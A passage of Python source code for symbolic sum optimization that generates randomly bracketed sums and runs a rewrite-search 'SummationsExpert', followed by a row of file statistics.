) # values are pairs (positive_terms, negative_terms)
for var, coeff in _collect_terms_into_dict(expr).items():
if var == "": # constant term
if coeff != 0:
subexpressions.append(Expression.Constant(coeff))
elif coeff > 0:
variables_by_coefficient[coeff][0].append(var)
elif coeff < 0:
variables_by_coefficient[-coeff][1].append(var)
pos_vars_coeff_1, neg_vars_coeff_1 = variables_by_coefficient[1]
subexpressions += [_make_variable(v) for v in pos_vars_coeff_1]
for coeff, (pos_vars, neg_vars) in variables_by_coefficient.items():
if coeff > 1:
if len(pos_vars) > 0:
if len(neg_vars) > 0:
subexpressions.append(
coeff
* (_sum_of_variables(pos_vars) - _sum_of_variables(neg_vars))
)
else:
subexpressions.append(coeff * _sum_of_variables(pos_vars))
else:
subexpressions.append((-coeff) * _sum_of_variables(neg_vars))
sum_exprs = (
_sum_of_expressions(subexpressions)
if len(subexpressions) > 0
else Expression.Constant(0)
)
return _symtab_and_defs.make_toplevel(
sum_exprs - _sum_of_variables(neg_vars_coeff_1)
if neg_vars_coeff_1
else sum_exprs
)
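# A minimal usage sketch (illustrative; the exact optimized shape can
# vary with the coefficient grouping described in the docstring):
#
#   x1 = _make_variable("x1")
#   x2 = _make_variable("x2")
#   e = x1 + (x2 + (x1 + Expression.Constant(3)))
#   optimized = optimize_by_collecting_terms(e)
#   # collects to something equivalent to: 3 + x2 + 2 * x1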
def try_optimize_by_collecting_terms(expr: Expression) -> Optional[ExprWithEnv]:
""" Return the optimized form if possible, or None if the input expression
is not a summation of the appropriate form """
try:
return optimize_by_collecting_terms(expr)
except ValueError:
return None
def _randomly_bracketed_sum(terms, rng):
""" Generate a sum of the given terms, where the terms appear in order
from left to right, but with random bracketing of terms.
This function generates every possible bracketing with equal probability.
"""
T = len(terms)
# Each possible bracketed summation can be written in prefix form, e.g.
# + + t1 + t2 t3 + t4 t5
# This sequence of operators and terms maps to a sequence of boolean values
# of length (2T-1) which describes the positions of the operators, i.e.
# [True True False True False False True False False]
# Conversely it can be shown that, given a sequence of boolean values of
# length (2T-1), of which exactly (T-1) values are True, there is exactly
# one rotation of this sequence which corresponds to a valid summation.
# So we can generate a random bracketing by first choosing a sequence
# of booleans at random ...
is_operator = [False] * (2 * T - 1)
for x in rng.sample(range(2 * T - 1), T - 1):
is_operator[x] = True
# ... and then finding the rotation which corresponds to a valid expression:
partial_sums = itertools.accumulate((1 if e else -1) for e in is_operator)
_, min_index = min(
(partial_sum, ind) for ind, partial_sum in enumerate(partial_sums)
)
is_operator = is_operator[min_index + 1 :] + is_operator[: min_index + 1]
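# Worked example for T=3: if is_operator == [False, True, False,
# True, False], the partial sums are [-1, 0, -1, 0, -1], min_index
# is 0, and the rotation yields [True, False, True, False, False],
# i.e. the valid prefix expression "+ t1 + t2 t3".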
# This sequence is then converted to an Expression:
term_index = 0
incomplete_nodes = [None]
for op in is_operator:
if op:
incomplete_nodes.append(None)
else:
val = terms[term_index]
term_index += 1
while incomplete_nodes[-1] is not None:
val = incomplete_nodes.pop() + val
incomplete_nodes[-1] = val
assert term_index == len(terms)
return utils.single_elem(incomplete_nodes)
def generate_sum(
num_terms: int, rng: random.Random, max_constant_term=2, fold=False
) -> ExprWithEnv:
""" Generate an example expression which is a sum of the specified number of terms.
There will be 2 or 3 constant terms in random positions. The remaining terms
are distinct variables. """
assert num_terms >= 3
distance_between_constant_terms = rng.randint((num_terms + 1) // 2, num_terms - 1)
first_constant_term = rng.randint(
0, num_terms - distance_between_constant_terms - 1
)
if rng.random() > 0.5:
constant_term_indices = [
first_constant_term,
first_constant_term + distance_between_constant_terms,
]
else:
constant_term_indices = [
first_constant_term,
first_constant_term + rng.randint(1, distance_between_constant_terms - 1),
first_constant_term + distance_between_constant_terms,
]
terms = []
variable_index = 0
for i in range(num_terms):
if i in constant_term_indices:
terms.append(Expression.Constant(rng.randint(1, max_constant_term)))
else:
terms.append(_make_variable("x{}".format(variable_index)))
variable_index += 1
return _symtab_and_defs.make_toplevel(
_sum_of_expressions(terms) if fold else _randomly_bracketed_sum(terms, rng)
)
def generate_sums(
n: int, min_terms: int, max_terms: int, *, seed=12345, fold=False, choose_from=None
) -> Optional[List[ExprWithEnv]]:
""" Generate the specified number of example expressions (with no duplicates).
The constants used in the expressions will normally have a maximum value of 2,
but this is increased if the number of examples requested is very large.
If choose_from is not None then the expressions will be randomly sampled from a
larger set of expressions, where the larger set consists of the expressions that
would be generated for n=choose_from.
"""
assert min_terms <= max_terms
if choose_from is None:
choose_from = n
else:
assert choose_from >= n
rng = random.Random(seed)
approx_different_sums = sum(
i * i * i for i in range(min_terms, max_terms + 1)
) # Crude approximation of the total number of examples that it is possible to generate with constants at most 2.
sums = set()
sums_list = []
for num_attempts in itertools.count():
num_terms = num_attempts % (max_terms - min_terms + 1) + min_terms
max_constant_term = num_attempts // approx_different_sums + 2
new_sum = generate_sum(num_terms, rng, max_constant_term, fold=fold)
if new_sum not in sums:
sums.add(new_sum)
sums_list.append(new_sum)
if len(sums_list) >= choose_from:
return sums_list if choose_from == n else rng.sample(sums_list, n)
return None
def _num_consts(e):
if e.op == "constant":
return 1
if not hasattr(e, "_num_consts"):
e._num_consts = sum(_num_consts(c) for c in e.children)
return e._num_consts
Subst = Mapping[str, Expression]
def _apply_subst(e: Expression, subst) -> Expression:
if e.op == "constant":
return e
if e.op == "variable":
return subst[e.name]
assert e.op == "add"
return _apply_subst(e.left, subst) + _apply_subst(e.right, subst)
class Step(NamedTuple):
prev_skel: Expression
rewritten: Expression # Rewrite of previous (may not be a skeleton: placeholder vars could be out of order)
rewritten_as_expr: Expression # The same rewrite, but turned back into a form equivalent to the original expression (no placeholders)
class SummationsExpert:
@staticmethod
def _skel_and_substs(e: Expression) -> Tuple[Expression, Subst]:
""" Returns a tuple of:
* the skeleton of an expression: a version of e with maximal subtrees containing no constants replaced by a placeholder variable,
where the placeholders are numbered e0, e1 etc. in increasing order left-right.
* the substitution from variable names to subtrees-containing-no-constants that gives back the original expression.
"""
subs: Dict[str, Expression] = {}
def helper(subexp):
if subexp.op == "constant":
return subexp
if _num_consts(subexp) == 0:
temp = _make_variable(f"e{len(subs)}")
subs[temp.name] = subexp
return temp
assert subexp.op == "add"
return helper(subexp.left) + helper(subexp.right)
res = helper(e)
assert _apply_subst(res, subs) == e
return res, subs
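# Example (illustrative): for e == (x + 1) + (y + z), the skeleton is
# (e0 + 1) + e1 with substitution {"e0": x, "e1": y + z}.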
def __init__(self, num_time_heads=None):
# Cache the next step along the best path for *skeletons* only.
# Here we allow the cache to grow without bound, but we could use any eviction policy.
self._cache = {}
self._num_time_heads = num_time_heads
self._rules = rewrites.RuleSet(
[rewrites.rule(n) for n in ["assoc_add_add", "commute_add", "cprop_add"]]
)
def get_sequence(self, exprenv: ExprWithEnv) -> List[ExprWithEnv]:
assert exprenv.env is _symtab_and_defs
return [
_symtab_and_defs.make_toplevel(e)
for e in self.get_sequence_expr(exprenv.expr)
]
def get_sequence_expr(self, e: Expression) -> List[Expression]:
if len(e.children) == 0:
return []
l, r = _num_consts(e.left), _num_consts(e.right)
if l + r <= 1:
return []
if l == 0:
return [
e.clone_with_new_children([e.left, s])
for s in self.get_sequence_expr(e.right)
]
if r == 0:
return [
e.clone_with_new_children([s, e.right])
for s in self.get_sequence_expr(e.left)
]
seq = self._search_to_smaller(e)
return seq + self.get_sequence_expr(seq[-1])
def _search_to_smaller(self, e: Expression) -> List[Expression]:
# Return sequence of Expressions, each being one rewrite from the previous (the first one rewrite from e),
# to an expression whose skeleton is smaller than e
def possible_next_steps(skel) -> Sequence[Expression]:
if skel in self._cache:
# We know the best thing to do with this skeleton, there is only one possibility
return [self._cache[skel]]
# Don't yet know which rewrite to do. Each rewrite is a possibility.
return [
rw.apply_expr(skel) for rw in self._rules.get_all_rewrites_expr(skel)
]
assert _num_consts(e) > 1
skel1, substs1 = self._skel_and_substs(e)
cands: Dict[Expression, Tuple[List[Step], Subst]] = {skel1: ([], substs1)}
# Breadth-first search to the nearest Expression with a smaller skeleton.
# 4 steps believed sufficient for any Expr (with <=3 constants).
for _ in range(4):
ncands = {}
for cand_skel, (seq, substs) in cands.items():
for next_step in possible_next_steps(cand_skel):
# next_step is the result of a rewrite, using vars from cand_skel
# (not necessarily a skeleton: placeholder vars could be out of order)
# Get back the actual non-skeleton expression, and convert to a valid skeleton (with placeholders numbered L-R)
next_as_expr = _apply_subst(next_step, substs)
nskel, nsubsts = self._skel_and_substs(next_as_expr)
ncands[nskel] = (
seq + [Step(cand_skel, next_step, next_as_expr)],
nsubsts,
)
best = min(ncands, key=lambda skel: skel.num_nodes)
if best.num_nodes < skel1.num_nodes:
seq, _ = ncands[best]
res = []
# Found sequence. Record each step. (Possibly worth it only for sequences of length>1 or excluding cprop_add's?)
for skel, nskel, next_as_expr in seq:
self._cache[skel] = nskel
res.append(next_as_expr)
return res
cands = ncands
raise ValueError(
"\n".join(
[
f"Could not reduce skeleton of {e} from {skel1}, candidates: {cands.keys()}"
]
)
)
def evaluate_all_time_left(self, exprenvs: Iterable[ExprWithEnv]) -> np.ndarray:
def eval_expr(e):  # local helper; named to avoid shadowing the builtin eval
seq = self.get_sequence(e)
cost_seq = [0] + [e.cost() - s.cost() for s in seq]
if self._num_time_heads is not None:
cost_seq = cost_seq[: self._num_time_heads]
cost_seq += cost_seq[-1:] * (self._num_time_heads - len(cost_seq))
return cost_seq
data = [eval_expr(exprenv) for exprenv in exprenvs]
if self._num_time_heads is None:
res = np.array(data, dtype=object) # May be jagged
else:
res = np.array(data, dtype=float)
assert len(res.shape) == 2
return res
| 39.888608 | 145 | 0.626174 | 2,075 | 15,756 | 4.56 | 0.195663 | 0.017755 | 0.008878 | 0.012682 | 0.175122 | 0.120799 | 0.101036 | 0.067956 | 0.047347 | 0.01226 | 0 | 0.011139 | 0.293476 | 15,756 | 394 | 146 | 39.989848 | 0.838843 | 0.265613 | 0 | 0.120567 | 0 | 0 | 0.022497 | 0 | 0 | 0 | 0 | 0 | 0.035461 | 1 | 0.074468 | false | 0 | 0.042553 | 0.010638 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |